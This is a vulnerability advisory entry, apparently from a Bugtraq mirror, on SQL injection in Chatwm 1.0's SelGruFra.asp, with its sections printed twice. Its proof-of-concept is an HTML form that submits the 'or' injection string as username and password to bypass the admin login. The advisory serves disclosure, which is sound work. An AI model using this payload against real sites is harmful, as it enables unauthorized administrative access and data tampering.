Chatwm SelGruFra.ASP SQL Injection Vulnerabilities
BID:21732
Info
Chatwm SelGruFra.ASP SQL Injection Vulnerabilities
| Bugtraq ID: | 21732 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 24 2006 12:00AM |
| Updated: | Jan 02 2007 06:06PM |
| Credit: | ShaFuq31 is credited with the discovery of this vulnerability. |
| Vulnerable: |
Chatwm Chatwm 1.0 |
| Not Vulnerable: | |
Discussion
Chatwm SelGruFra.ASP SQL Injection Vulnerabilities
Chatwm is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Chatwm is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Exploit / POC
Chatwm SelGruFra.ASP SQL Injection Vulnerabilities
Attackers may use a browser to trigger this issue.
The following example was provided:
Manual connect :
Go to Admin Panel Login -----> http://www.example.com/[path to script]/login.asp
Remote connect :
<title>Remote Admin Attack - LiderHack.Org // Hacking & Security PortaL</title>
<center>ShaFuck31 - LiderHack.Org</center>
<FORM NAME=giris ACTION="http://www.example.com/d/asp/SelGruFra.asp" METHOD=post>
<table align=center>
<td>Kullanici Adi:</td><td><INPUT NAME=txtUse class="input" value="'or'" SIZE=15></td>
</tr><tr>
<td>Sifre:</td><td><INPUT NAME=txtPas TYPE=text class="input" value="'or'" SIZE=15></td>
</tr><tr>
<td align=center colspan=2><BUTTON class="input" TYPE=submit>Giris</BUTTON></td>
</tr></table></form>
Attackers may use a browser to trigger this issue.
The following example was provided:
Manual connect :
Go to Admin Panel Login -----> http://www.example.com/[path to script]/login.asp
Remote connect :
<title>Remote Admin Attack - LiderHack.Org // Hacking & Security PortaL</title>
<center>ShaFuck31 - LiderHack.Org</center>
<FORM NAME=giris ACTION="http://www.example.com/d/asp/SelGruFra.asp" METHOD=post>
<table align=center>
<td>Kullanici Adi:</td><td><INPUT NAME=txtUse class="input" value="'or'" SIZE=15></td>
</tr><tr>
<td>Sifre:</td><td><INPUT NAME=txtPas TYPE=text class="input" value="'or'" SIZE=15></td>
</tr><tr>
<td align=center colspan=2><BUTTON class="input" TYPE=submit>Giris</BUTTON></td>
</tr></table></form>
Solution / Fix
Chatwm SelGruFra.ASP SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any solutions for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any solutions for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
Chatwm SelGruFra.ASP SQL Injection Vulnerabilities
References:
References: